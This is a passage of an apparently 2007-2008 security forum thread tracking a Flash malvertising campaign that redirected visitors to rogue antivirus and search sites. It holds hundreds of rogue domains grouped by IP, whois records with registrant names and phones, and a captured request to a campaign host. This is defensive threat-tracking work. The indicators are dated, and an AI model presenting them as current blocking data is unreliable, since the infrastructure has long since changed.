  71. Netturbopro.com
  72. Onestopshopz.com
  73. Opensols.com
  74. Pcsoftw.com
  75. Pcsupercharger.com
  76. Popadprovider.com
  77. Popsmedia.com
  78. Popupnukerpro.com
  79. Prenetsearch.com
  80. Prevedmarketing.com
  81. Prizesforyou.com
  82. R2d2adverising.com
  83. Rocktheads.com
  84. Roller-search.com
  85. Rombic-search.com
  86. Searchcolours.com
  87. Sellmoresoft.com
  88. Selvascreensaver.com
  89. Sharpadverts.com
  90. Shivanetworking.com
  91. Shopshot.com
  92. Softwcs.com
  93. Stratosearch.com
  94. Swiftcleaner.com
  95. Tallgrass-seach.com
  96. Traffalo.com
  97. Traveltray.com
  98. Uniqads.com
  99. Vitecmedia.com
  100. Waytotheprofit.com
  101. Windefender.com
  102. Wontu-search.com
  103. Workhomecenter.com
  104. Yourseeker.com
  105. Yourshopz.com
  106. Yourteacheronline.com
  107. Zappinads.com
  108. Zooworld-search.com

84.243.253.220

  1. Anonymbrowser.com
  2. Blablahost.com
  3. Errordigger.com
  4. Errorinspector.com
  5. Passwordinspector.com
  6. Performanceoptimizer.com
  7. Sellmosoft.net
  8. Internetsupernanny.com

77.91.229.103

  1. Malware-scan.com
  2. Xmalware-scan.com

77.91.229.104

  1. scanner2.malware-scan.com

67.55.81.200

  1. Accelerateurmaligne.com
  2. Aceleradorlisto.com
  3. Addioerrori.com
  4. Adremversneller.com
  5. Anonymwinpc.com
  6. Antimalwareshield.com
  7. Antispywarecontrole.com
  8. Antispywarecontrollo.com
  9. Antispywarekontrolle.com
  10. Antispywareseigyo.com
  11. Antivirusgereedschap.com
  12. Antivirusscherm.com
  13. Antivirussolusjon.com
  14. Aucunsvirus.com
  15. Avsystemcare.com
  16. Bedsteantivirus.com
  17. Bereiniger.com
  18. Cleverspeeder.com
  19. Controlantiespia.com
  20. Defectshuri.com
  21. Doraibuhogo.com
  22. Easysprinter.com
  23. Echterschutz.com
  24. Effaceurvirus.com
  25. Elevarendimiento.com
  26. Enkelsprinter.com
  27. Errclean.com
  28. Erreurchasseur.com
  29. Fiksfeil.com
  30. Fixmenaces.com
  31. Handigebeheerder.com
  32. Harddrevvagt.com
  33. Hataduzelticisi.com
  34. Herramientadereparacion.com
  35. Hukommelsesbeskytter.com
  36. Hulpprogramma.com
  37. Kansennashi.com
  38. Kantansprinter.com
  39. Keinespuren.com
  40. Keinestoerungen.com
  41. Klogspeeder.com
  42. Klugerspeeder.com
  43. Kontentsueraser.com
  44. Kvikkpc.com
  45. Kyoishusei.com
  46. Leichtersprinter.com
  47. Lettsprinter.com
  48. Liberapc.com
  49. Lifelongpc.com
  50. Maskinpcpro.com
  51. Megaviruskit.com
  52. Megliopc.com
  53. Melhorpc.com
  54. Memoiredefenseur.com
  55. Mendingtool.com
  56. Minnesverktyg.com
  57. Moncontenuassistant.com
  58. Msahihalakhtaa.com
  59. Nemsprinter.com
  60. Nettoyagevirus.com
  61. Nientevirus.com
  62. Nochanceforvirus.com
  63. Noespias.com
  64. Nulinfektioner.com
  65. Ottimizzaveloce.com
  66. Pasokoneiju.com
  67. Pcforbedring.com
  68. Pclyftare.com
  69. Pcohneviren.com
  70. Pcoppdrettere.com
  71. Pcopschoner.com
  72. Pcopschoningsstel.com
  73. Pcraiser.com
  74. Pcreveil.com
  75. Pcsamensteller.com
  76. Pcscattista.com
  77. Pcschirmer.com
  78. Pcverdediger.com
  79. Performancekoujou.com
  80. Privacidadplus.com
  81. Protectioncomplete.com
  82. Puliscitutto.com
  83. Pulitasystem.com
  84. Rendator.com
  85. Rensningverktyg.com
  86. Reparameacas.com
  87. Reparamenazas.com
  88. Reparetudo.com
  89. Scattofacile.com
  90. Shufukutsuru.com
  91. Sicheressystem.com
  92. Sininfecciones.com
  93. Smartkasoku.com
  94. Smartokare.com
  95. Sprinterfacile.com
  96. Sprinterpc.com
  97. Sysdepannage.com
  98. Syskontroller.com
  99. Systemfreigabe.com
  100. Systemreiniging.com
  101. Tabortvirus.com
  102. Temizsurucu.com
  103. Utiledeprotection.com
  104. Varrevirus.com
  105. Velocidadsimple.com
  106. Vigilamenazas.com
  107. Virenloescher.com
  108. Virenstopper.com
  109. Virtual-leatherman.com
  110. Virusfjernere.com
  111. Virusudryddet.com
  112. Winadsiz.com
  113. Winanonyme.com
  114. Winanonymitet.com
  115. Winanzen.com
  116. Winbescherming.com
  117. Windefensa.com
  118. Windifesavirale.com
  119. Winhogo.com
  120. Winkujoenjin.com
  121. Winpcalmeglio.com
  122. Winpcdocteur.com
  123. Winpcdoktor.com
  124. Winpckontroll.com
  125. Winpcrensare.com
  126. Winpcrensere.com
  127. Winriservatezza.com
  128. Winsecurite.com
  129. Winsikkerantivirus.com
  130. Winsikretav.com
  131. Winsurffilter.com
  132. Wintemizleyicisi.com
  133. Wintrygghet.com
  134. Wirusumuryokuka.com
  135. Yoursystemguard.com

87.117.252.11

  1. Acchiappavirus.com
  2. Adiosvirus.com
  3. Ahorrememoria.com
  4. Altalimpeza.com
  5. Anonimutente.com
  6. Antiamenazas.com
  7. Antiespiamaestro.com
  8. Antievidence.com
  9. Antispionimaestro.com
  10. Antispywareconductor.com
  11. Antispywarecontrol.com
  12. Antispywaremaster.com
  13. Antispywaremeister.com
  14. Antispywaresuite.com
  15. Antivirusfiable.com
  16. Antivirusforall.com
  17. Antivirusforalla.com
  18. Antivirusforalle.com
  19. Antivirusfueralle.com
  20. Antivirusgenial.com
  21. Antivirusmagique.com
  22. Antivirusparatodos.com
  23. Antiviruspcsuite.com
  24. Anzentsuru.com
  25. Apagahistorico.com
  26. Apolloantivirus.com
  27. Archivosenestado.com
  28. Atemaiserro.com
  29. Atrapavirus.com
  30. Aucunchoixpourvirus.com
  31. Aucunefaute.com
  32. Aucuninfection.com
  33. Aucunmenace.com
  34. Aucunserreurs.com
  35. Avcompleto.com
  36. Avsecurityplus.com
  37. Avseguro.com
  38. Bandoaivirus.com
  39. Bandoalleinfezioni.com
  40. Barreraintegral.com
  41. Bastioneantivirus.com
  42. Beschermingstool.com
  43. Beskyttelseonline.com
  44. Beskyttendevaerktoj.com
  45. Bestsellerantivirus.com
  46. Blanchdisc.com
  47. Borresuspasos.com
  48. Bossedeserreurs.com
  49. Brossedesfautes.com
  50. Bugseraser.com
  51. Caiforavirus.com
  52. Ceroamenazas.com
  53. Cerovirus.com
  54. Chasseurdeserreures.com
  55. Cleanerpotente.com
  56. Cleanpctool.com
  57. Cleanuptool.com
  58. Confidentsurf.com
  59. Confidentuser.com
  60. Contenidoseguros.com
  61. Contenteraser.com
  62. Controledemenaces.com
  63. Controlloreprivacy.com
  64. Curerrores.com
  65. Dataconfidentiality.com
  66. Defensaantivirus.com
  67. Defensecelebre.com
  68. Defensededriver.com
  69. Defensedinformation.com
  70. Defensedudisque.com
  71. Defensenetsurfage.com
  72. Defensivesystem.com
  73. Dejitarufukugen.com
  74. Dejitarukyoikira.com
  75. Dejitaruwakuchin.com
  76. Detapurotekuta.com
  77. Detaripea.com
  78. Detectaerrores.com
  79. Discoseguro.com
  80. Diskassistent.com
  81. Diskretter.com
  82. Disksaeuberung.com
  83. Disksizesaver.com
  84. Disksparare.com
  85. Disukushuri.com
  86. Doubledefender.com
  87. Driversecurise.com
  88. Einwandfreierpc.com
  89. Eliminadordeamenazas.com
  90. Elmejorantivirus.com
  91. Emperahogo.com
  92. Enmiendaerrores.com
  93. Equipoantiespia.com
  94. Eracheisa.com
  95. Erasutoppu.com
  96. Errorfighter.com
  97. Essentialeraser.com
  98. Expertdantispyware.com
  99. Exterminadordevirus.com
  100. Extremuclean.com
  101. Fairukyua.com
  102. Fehlerbeseitiger.com
  103. Feilvakt.com
  104. Fejlfripc.com
  105. Fejlreparering.com
  106. Felfixare.com
  107. Ferramentadesolucao.com
  108. Ferramentasegura.com
  109. Festplattencleaner.com
  110. Festplattenreiniger.com
  111. Festplattentool.com
  112. Fiksdinpc.com
  113. Filtredetraces.com
  114. Filtrototal.com
  115. Fixthemnow.com
  116. Fjernervirus.com
  117. Foutenwacht.com
  118. Geheugenredder.com
  119. Guardiandelaprivacidad.com
  120. Guardianodelpc.com
  121. Gubbishremover.com
  122. Hackerstaisaku.com
  123. Hadodoraibugado.com
  124. Harddriveguard.com
  125. Herramientasegura.com
  126. Historialout.com
  127. Hotbevakning.com
  128. Ingavirus.com
  129. Ingenmulighetforvirus.com
  130. Inhaltsaeuberung.com
  131. Inhaltspeicher.com
  132. Inmunepc.com
  133. Kakujitsutsuru.com
  134. Keinespurenlassen.com
  135. Keineviren.com
  136. Knowhowprotection.com
  137. Konsekiauto.com
  138. Kontentsufiruta.com
  139. Kurinkonseki.com
  140. Kyoiireza.com
  141. Kyoikanshi.com
  142. Kyoryokucleaner.com
  143. Largavidapc.com
  144. Laufwerkcleaner.com
  145. Libresystem.com
  146. Limpiapc.com
  147. Limpietodo.com
  148. Lomejorenantivirus.com
  149. Longlifepc.com
  150. Lungavitapc.com
  151. Maechtigerreiniger.com
  152. Malwareschutz.com
  153. Manutencaopc.com
  154. Memorisebu.com
  155. Menacecontrole.com
  156. Menacefighter.com
  157. Menacemonitor.com
  158. Menacescrubber.com
  159. Menacesprotection.com
  160. Miavcompleto.com
  161. Mightycleaner.com
  162. Minnesparere.com
  163. Monitordeamenazas.com
  164. Moteurpcpro.com
  165. Mycontentassistant.com
  166. Netsurfageassure.com
  167. Nettoyeurdepc.com
  168. Nettoyeurdeserreures.com
  169. Nettoyeurdevirus.com
  170. Nettoyeurpuissant.com
  171. Neuerantivirus.com
  172. Neuerschild.com
  173. Nientetracce.com
  174. Nouvelantivirus.com
  175. Nurdeinpc.com
  176. Ohnespurensurfen.com
  177. Omelhorantivirus.com
  178. Onlinehelpmate.com
  179. Onlineverktyg.com
  180. Onrainpurotekuta.com
  181. Ordureffaceur.com
  182. Oruripea.com
  183. Pasderreurs.com
  184. Pasdesfautes.com
  185. Pasdesmenaces.com
  186. Pasendommagement.com
  187. Pasplusdespertes.com
  188. Pasplusdevirus.com
  189. Pcantiviruspro.com
  190. Pcassertor.com
  191. Pcbewaker.com
  192. Pcboosterpro.com
  193. Pcbunan.com
  194. Pceternel.com
  195. Pcforfender.com
  196. Pchealthkeeper.com
  197. Pchjaelper.com
  198. Pcinforedder.com
  199. Pclibredevirus.com
  200. Pcohnespuren.com
  201. Pcprivacytool.com
  202. Pcredskab.com
  203. Pcsansbug.com
  204. Pcsecuresystem.com
  205. Pcsecurise.com
  206. Pcsentineru.com
  207. Pcsiemprenueva.com
  208. Pctoolpro.com
  209. Pcultralimpia.com
  210. Pcveiligheidstool.com
  211. Pcvirussweeper.com
  212. Perfektantivirus.com
  213. Personalityprotector.com
  214. Poseidonantivirus.com
  215. Poupememoria.com
  216. Preservingtool.com
  217. Privacidadconductor.com
  218. Privacidadgarantizada.com
  219. Privacidadyseguridad.com
  220. Privacyconductor.com
  221. Privacyredder.com
  222. Privacywaker.com
  223. Privacywarrior.com
  224. Privatsicherer.com
  225. Protecaoconfiavel.com
  226. Proteccionasegurada.com
  227. Proteccioncompleta.com
  228. Proteccionimperial.com
  229. Protecteurdinfo.com
  230. Protectionassuree.com
  231. Protectionconue.com
  232. Protectiondedriver.com
  233. Protectiondenetsurfage.com
  234. Proteggidati.com
  235. Protezioneesperta.com
  236. Protezionefidata.com
  237. Pulituraestrema.com
  238. Puraibashihosho.com
  239. Puraibashimaneja.com
  240. Puraibashitoshinrai.com
  241. Rendimientototal.com
  242. Rensanu.com
  243. Reparaerrores.com
  244. Reparateurdesysteme.com
  245. Repareja.com
  246. Reparemenaces.com
  247. Repareya.com
  248. Rimuoviciarpame.com
  249. Riparaminacce.com
  250. Riparasubito.com
  251. Riservatezzanet.com
  252. Safeharddrive.com
  253. Safepctool.com
  254. Safudaijoubu.com
  255. Salvaspaziosudisco.com
  256. Sansendommagement.com
  257. Sansinfections.com
  258. Sayonarabaggu.com
  259. Schijfbewaker.com
  260. Schijfcontroleur.com
  261. Schijfredder.com
  262. Schijfruimteredder.com
  263. Schutzderdaten.com
  264. Schutzfuerpc.com
  265. Schutztool.com
  266. Secretissimosoft.com
  267. Secretopertutti.com
  268. Secretosasalvo.com
  269. Secretoseguro.com
  270. Securepccleaner.com
  271. Sefunahimitsu.com
  272. Sekretessforsvarare.com
  273. Senzadoppioni.com
  274. Shingaidome.com
  275. Shinraihogo.com
  276. Shinraipafomansu.com
  277. Shisutemudifensu.com
  278. Sichererantivirus.com
  279. Sichererschutz.com
  280. Sicherheitstool.com
  281. Sikkerbrukere.com
  282. Sikkerpcredskap.com
  283. Sikkersystem.com
  284. Sinataques.com
  285. Sinrrastros.com
  286. Sinsenales.com
  287. Sistemaprotegido.com
  288. Sistemupyua.com
  289. Sisutemuantei.com
  290. Sisutemuorugurin.com
  291. Skyddsprogram.com
  292. Smittfri.com
  293. Solelunaantivirus.com
  294. Speichertool.com
  295. Spyguardpro.com
  296. Spywaretaisakumaster.com
  297. Stopbedreiging.com
  298. Stopminacce.com
  299. Storageprotector.com
  300. Succesantivirus.com
  301. Superanonimo.com
  302. Surfforsure.com
  303. Surfremover.com
  304. Sutoppuwirusu.com
  305. Syssauvegarde.com
  306. Systemerrorfixer.com
  307. Systemesansfaute.com
  308. Systemesansvirus.com
  309. Systemhoover.com
  310. Systemschild.com
  311. Tackanejvirus.com
  312. Tilforlatelig.com
  313. Toolsicuro.com
  314. Topsalgantivirus.com
  315. Trasheraser.com
  316. Trojansfilter.com
  317. Trusselovervagning.com
  318. Trustedantivirus.com
  319. Trustedprotection.com
  320. Tryggpcverktyg.com
  321. Trygpcbruger.com
  322. Turnkeyantivirus.com
  323. Unidadessanas.com
  324. Usuarioprotegido.com
  325. Utiledereparation.com
  326. Utilisateursur.com
  327. Vaktmotvirus.com
  328. Veiligheidsagent.com
  329. Virenvernichter.com
  330. Virusbekaemper.com
  331. Virusgarde.com
  332. Viruskrakker.com
  333. Virussperr.com
  334. Virusurimuva.com
  335. Virusvanger.com
  336. Virusvijand.com
  337. Volumformatredskap.com
  338. Wegvonviren.com
  339. Winanonymous.com
  340. Winpcdoctor.com
  341. Winsecureav.com
  342. Winspycontrol.com
  343. Wirusufinisshu.com
  344. Wirusuk.com
  345. Wirusukyua.com
  346. Wirusushattodaun.com
  347. Wirusushuryo.com
  348. Yourprivacyguard.com
  349. Yuzasefu.com
  350. Zentaiwakuchin.com

24.244.171.69

  1. 2greatfind.com
  2. 2quickfind.com
  3. Alg-search.com
  4. All-search-it.com
  5. Bestdatafinder.com
  6. Besteversearch.com
  7. Bi-bi-search.com
  8. Bucksbill.com
  9. Candid-search.com
  10. Cha-cha-search.com
  11. Cleanator.com
  12. Clever-at-search.com
  13. Deuscleaneronline.com
  14. Deuspayment.com
  15. Didosearch.com
  16. Fandasearch.com
  17. Fati-gati-search.com
  18. Favourable-search.com
  19. Feel-search.com
  20. Findbyall.com
  21. Firstbestsearch.com
  22. Firstlastsearch.com
  23. Fokus-search.com
  24. Force-search.com
  25. Fulsearch.com
  26. Glass-search.com
  27. Gt-search.com
  28. Ideal-search.com
  29. Individ-search.com
  30. Initial-search.com
  31. Kazilkasearch.com
  32. Loffersearch.com
  33. Londasearch.com
  34. Mad-search.com
  35. Myusefulsearch.com
  36. Nudesweetmature.com
  37. Ol-search.com
  38. Original-search.com
  39. Se7ensearch.com
  40. Search-and-win.com
  41. Search-angle.com
  42. Search-deal.com
  43. Search-expand.com
  44. Search-into.com
  45. Search-the-best.com
  46. Search-the-prey.com
  47. Search-west.com
  48. Searchcompleteness.com
  49. Searchmandrake.com
  50. Searchonline-ease.com
  51. Searchoperation.com
  52. Searchvirtuoso.com
  53. Simplesamplesearch.com
  54. Such-search.com
  55. The-same-search.com
  56. Treekindsearch.com
  57. Type-and-find.com
  58. Ultimatepayment.com
  59. Unicsearch.com
  60. Wewillfind.com
  61. Windfiresearch.com

193.227.121.34

  1. Superiordatingsite.com
  2. Surveypaiz.com

24.244.170.178

  1. statsgod.com

Associated IP's (download centers)


content.onerateld.com - 209.8.114.5

canonical name g1.panthercdn.com
Domain Name: ONERATELD.COM
Registrar: YESNIC CO. LTD.
Name Server: NS1.ONERATELD.COM
Name Server: NS2.ONERATELD.COM
Updated Date: 07-dec-2007
Creation Date: 26-dec-2006
Expiration Date: 26-dec-2008

sec.storageguardsoft.com - 209.8.114.8

canonical name g1.panthercdn.com
Domain Name: STORAGEGUARDSOFT.COM
Registrar: YESNIC CO. LTD.
Name Server: NS9.NSCACHE.NET
Name Server: NS8.NSCACHE.NET
Updated Date: 03-dec-2007
Creation Date: 07-dec-2006
Expiration Date: 07-dec-2008

Other domains hosting gnida.swf


aheadad.com - 205.252.251.18

Server Type: Apache/1.3.37 (Unix) PHP/5.2.3
IP Location - Alaska - Ketchikan - Beyond The Network America Inc
Reverse IP: 7 other sites hosted on this server.

::Domain servers in listed order::
ns2.ah-dns.com
ns1.ah-dns.com

::Dates & Status::
Creation Date: 12-Oct-2007
Expiration Date: 12-Oct-2008
Status:ACTIVE

Websites.
  1. Aheadad.com
  2. Fuckmomsladyfriend.com
  3. Gayfunworld.com
  4. Gayteenplace.com
  5. Hotfreebbw.com
  6. Onlyshemale.net
  7. Plumppornvideo.com
  8. Windowssecurecenter.com
Kimberly
Flash swf files hit the news again. Unfortunately this time we are not talking about redirects to fake spyware alerts but about getting redirected to a porn site with streaming video content.

An advertisement for Chanel watches hosted by ad.doubleclick and shown on The Official Site of Major League Baseball (mlb.com) is indeed redirecting people to hqtube.com.
The advert in question is ad.doubleclick.net/1674952/mlb_chanel.swf
Again you can find the culprit back by examining the HTTP referers when you enter the hqtube.com website. Furthermore hqtube.com sets a cookie containing a reference to the same ad.doubleclick swf file.
The user is also prompted to install the Chinese language pack when entering hqtube.com.

Mlb.com has a page for people with slow connections. It doesn’t play the flash adverts. If you don’t want to block ads or disable Flash, use that link instead of the normal homepage. You won’t get redirected.

Narrow broadband link:
http://mlb.mlb.com/mlb/homepage/narrowband.jsp

Full story by Sandi Hardmeier.
MLB.COM users hijacked and redirected to pornographic web site, complete with graphic videos - DOUBLECLICK involved

hqtube.com - 88.85.66.116


Server Type: nginx/0.3.51
IP Location - Utrecht - Utrecht - Webazilla

Registration Service Provided By: Enom, Inc

Administrative Contact:
ICOO SOFT LTD
Vadim Fatkullin ()
+357.25341300
Fax: +357.25342030
Gladstonos 120-C2
Lemesos, 3032
CY

Status: Locked

Name Servers:
ns1.serverfield.com
ns2.serverfield.com
ns3.serverfield.com
ns4.serverfield.com

Creation date: 14 Aug 2006 14:42:05
Expiration date: 14 Aug 2008 14:42:05

Websites hosted on 88.85.66.116
  1. Filespray.com
  2. Hqtube.com
Kimberly

newbieadguide.com - vozemiliogaranon.com - thetechnorati.com - akamahi.net - ?


Time to update your IP blocks, the guys moved ...
91.199.50.14 - akamahi.net
91.199.50.15 - newbieadguide.com
91.199.50.16 - thetechnorati.com
91.199.50.17 - vozemiliogaranon.com
91.199.50.18 - ?

91.199.50.14 - 91.199.50.18

QUOTE
inetnum: 91.199.50.0 - 91.199.50.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: ECATEL-MNT
mnt-routes: ECATEL-MNT
mnt-domains: ECATEL-MNT
source: RIPE # Filtered

organisation: ORG-NDF1-RIPE
org-name: Netrouting Data Facilities
org-type: OTHER
address: Van Halewijnlaan 319
address: 2274 TK Voorburg
address: The Netherlands
phone: +31 654 620 994
abuse-mailbox:
mnt-ref: GFX-MNT
mnt-by: GFX-MNT
source: RIPE # Filtered

person: S Bout
org: ORG-NDF1-RIPE
address: Van Halewijnlaan 319
address: 2274 TK Voorburg
address: The Netherlands
phone: +31 654 620 994
nic-hdl: SBT10-RIPE
source: RIPE # Filtered

route: 91.199.50.0/24
descr: Netrouting Data Facilities
origin: AS16131
mnt-by: GFX-MNT
source: RIPE # Filtered
As always keep an eye on Sandi Hardmeier's blog too.
http://msmvps.com/blogs/spywaresucks/default.aspx
Kimberly
And the move keeps going on!

mysurvey4u.com - 194.110.67.22

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities
Domain Name : mysurvey4u.com

::Name Servers::
ns1.mysurvey4u.com
ns2.mysurvey4u.com

::Dates & Status::
Created Date 2006-12-04 09:57:28 EST
Updated Date 2007-12-03 20:06:35 EST
Valid Date 2008-12-04 09:57:28 EST
Status ACTIVE

Websites
  1. Mysurvey4u.com
  2. Singlemetro.com
______________________________

traveltray.com - 194.110.67.23

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Name Servers::
NS1.TRAVELTRAY.COM 190.15.73.251
NS2.TRAVELTRAY.COM 190.15.73.252

::Dates & Status::
Record last updated on 02-Jun-2007.
Record expires on 01-Jul-2008.
Record created on 01-Jul-2004.
Domain status: clientTransferProhibited - clientUpdateProhibited

Websites
  1. Specificissue.com
  2. Traveltray.com
______________________________

netmediagroup.net - 84.243.252.91

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: netmediagroup.net is hosted on a dedicated server.

::Name Servers::
ns1.netmediagroup.net
ns2.netmediagroup.net

::Dates & Status::
Created Date 2006-06-29 05:38:33 EDT
Updated Date 2007-06-27 17:59:00 EDT
Valid Date 2008-06-29 05:38:33 EDT
Status ACTIVE
______________________________

traffalo.com - 84.243.252.94

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: traffalo.com is hosted on a dedicated server.

::Name Servers::
NS1.TRAFFALO.COM 190.15.73.251
NS2.TRAFFALO.COM 190.15.73.252

::Dates & Status::
Record last updated on 26-Apr-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.
Domain status: clientTransferProhibited - clientUpdateProhibited
______________________________

uniqads.com - 84.243.252.97

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: uniqads.com is hosted on a dedicated server.

::Name Servers::
NS2.UNIQADS.COM 190.15.73.252
NS1.UNIQADS.COM 190.15.73.251

::Dates & Status::
Record last updated on 08-Jun-2007.
Record expires on 27-Apr-2008.
Record created on 27-Apr-2007.
Domain status: ok

Blocks


inetnum: 84.243.221.0 - 84.243.221.255
netname: GFX-CUST-NETROUTING
descr: Netrouting Data Facilities
org: ORG-NDF1-RIPE
country: NL
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PA
mnt-by: GFX-MNT

inetnum: 194.110.67.0 - 194.110.67.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: GFX-MNT
mnt-routes: GFX-MNT
mnt-domains: GFX-MNT

inetnum: 91.199.50.0 - 91.199.50.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: ECATEL-MNT
mnt-routes: ECATEL-MNT
mnt-domains: ECATEL-MNT
Kimberly

akamahi.net - newbieadguide.com - thetechnorati.com - vozemiliogaranon.com


Time to update your IP blocks (again).

64.38.4.131 - akamahi.net
64.38.4.133 - newbieadguide.com
64.38.4.134 - thetechnorati.com
64.38.62.234 - vozemiliogaranon.com

64.38.0.0 - 64.38.63.255

QUOTE
OrgName: FastServers, Inc.
OrgID: FASTS-1
Address: 175 W. Jackson Blvd
Address: Suite 1770
City: Chicago
StateProv: IL
PostalCode: 60604
Country: US

ReferralServer: rwhois://rwhois.fastservers.net:4321/

NetRange: 64.38.0.0 - 64.38.63.255
CIDR: 64.38.0.0/18
NetName: FASTSERVERS-CF
NetHandle: NET-64-38-0-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.FASTSERVERS.NET
NameServer: NS2.FASTSERVERS.NET
Comment:
RegDate: 2005-07-12
Updated: 2006-03-22

== Additional Information From rwhois://rwhois.fastservers.net:4321/ ==

network:Class-Name:network
network:ID:64-38-62-232-29.64.38.0.0/18
network:Auth-Area:64.38.0.0/18
network:Network-Name:64-38-62-232/29
network:IP-Network:64.38.62.232/29
network:Organization;I:CID-21976.64.38.0.0/18
network:Tech-Contact;I:
network:Admin-Contact;I:
network:Updated:20080111
network:Updated-By:

network:Class-Name:network
network:ID:FASTSERVERS-CF.64.38.0.0/18
network:Auth-Area:64.38.0.0/18
network:Network-Name:CF-64.38.0.0
network:IP-Network:64.38.0.0/18
network:Organization;I:FastServers, Inc
network:Tech-Contact;I:
network:Admin-Contact;I:FASTS-ARIN
network:Created:20050913
network:Updated:20060322
network:Updated-By:


Resolve Host: server1.cpvadvertizing.com

A cpvadvertizing.com
PTR server1.cpvadvertizing.com
NS ns1.cpvadvertizing.com 85.17.4.1
NS ns2.cpvadvertizing.com 85.17.4.2
IP's using PTR to this host:
  • 64.38.4.130
  • 64.38.4.131
  • 64.38.4.132
  • 64.38.4.133
  • 64.38.4.134
  • 64.38.62.234
Kimberly

Other domains hosting gnida.swf


More Netrouting Data Facilities

workhomecenter.com - 194.110.67.25

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS1.WORKHOMECENTER.COM 190.15.73.251
NS2.WORKHOMECENTER.COM 190.15.73.252

::Dates & Status::
Record last updated on 22-May-2007.
Record expires on 28-Feb-2008.
Record created on 28-Feb-2002.
Domain status: ok

Websites.
  1. Theirtrade.com
  2. Workhomecenter.com
______________________________

casinoaceking.com - 194.110.67.19

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS2.CASINOACEKING.COM 190.15.73.252
NS1.CASINOACEKING.COM 190.15.73.251

::Dates & Status::
Record last updated on 10-Dec-2007.
Record expires on 09-Jan-2009.
Record created on 09-Jan-2002.
Domain status: ok

Websites.
  1. Casinoaceking.com
  2. Regularhelp.com
______________________________

getfreecar.com - 194.110.67.22

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS1.GETFREECAR.COM 190.15.73.251
NS2.GETFREECAR.COM 190.15.73.252

::Dates & Status::
Record last updated on 05-Sep-2007.
Record expires on 07-Jul-2008.
Record created on 07-Jul-2003.
Domain status: ok

Websites.
  1. Getfreecar.com
  2. Singledaily.com
______________________________

gnida.swf is present on each of these domains.
Kimberly
In case you are curious how these redirects work, you can watch the video below. Unless explicitly clicked, most windows are closed using ALT+F4.
Note: Flash Player is needed.

The malicious banner on DiePresse.com is still active at the time of the writeup, so block or turn off Flash if you surf over there.
Kimberly

www.rhapsody.com


The campaign on DiePresse has been suspended but the banner is still hosted on their server. A new banner was reported recently on www.rhapsody.com. The redirect doesn't occur when you enter the site. Searching for music or artists brings up the malicious advert. The file is hosted at i.realone.com and it's again the skyauction banner as seen below.

CODE
Frame 265 (452 bytes on wire, 452 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: newbieadguide.com (190.15.64.188)
Transmission Control Protocol, Src Port: 1980 (1980), Dst Port: http (80), Seq: 1, Ack: 1, Len: 398
Hypertext Transfer Protocol
    GET /statsa.php?u=23423424&campaign=mi1eroof HTTP/1.1\r\n
    Accept: */*\r\n
    Referer: http://i.realone.com/ads/Rollingstone/1_skyauction_728x90.swf?clickTag=http://ad.doubleclick.net/click%3Bh=v8/3652/3/0/%2a/x%3B177176445%3B0\r\n
    x-flash-version: 9,0,47,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: newbieadguide.com\r\n
    Connection: Keep-Alive\r\n
    \r\n
Banner: i.realone.com/ads/Rollingstone/1_skyauction_728x90.swf
Campaign: newbieadguide.com/statsa.php?u=23423424&campaign=mi1eroof

In the meantime the bad guys kept on moving. They stayed a couple of days on Denit Internet Services in Amsterdam and now they are on the following IPs:

190.15.64.185 - akamahi.net
190.15.64.186 - ? - GET /swf/gnida.swf = ok
190.15.64.187 - ? - GET /swf/gnida.swf = ok
190.15.64.188 - newbieadguide.com
190.15.64.189 - ? - GET /swf/gnida.swf = ok
190.15.64.190 - quinquecahue.com
190.15.64.191 - thetechnorati.com
190.15.64.192 - vozemiliogaranon.com

QUOTE
% Joint Whois - whois.lacnic.net
% This server accepts single ASN, IPv4 or IPv6 queries


% Copyright LACNIC lacnic.net
% The data below is provided for information purposes
% and to assist persons in obtaining information about or
% related to AS and IP numbers registrations
% By submitting a whois query, you agree to use this data
% only for lawful purposes.
% 2008-01-25 15:11:36 (BRST -02:00)

inetnum: 190.15.64/20
status: allocated
owner: Secure Hosting Ltd.
ownerid: HN-SHLT-LACNIC
responsible: Secure Hosting Ltd.
address: Bufete Osorio, Edificio Palmira, --, 4th Floor
address: -- - Tegucigalpa - DC
country: HN
phone: +1 242 5028700 []
owner-c: RID2
tech-c: RID2
inetrev: 190.15.64/20
nserver: NS1.SECUREHOST.COM
nsstat: 20080121 AA
nslastaa: 20080121
nserver: NS2.SECUREHOST.COM
nsstat: 20080121 AA
nslastaa: 20080121
created: 20061006
changed: 20061006

nic-hdl: RID2
person: Richard Douglas
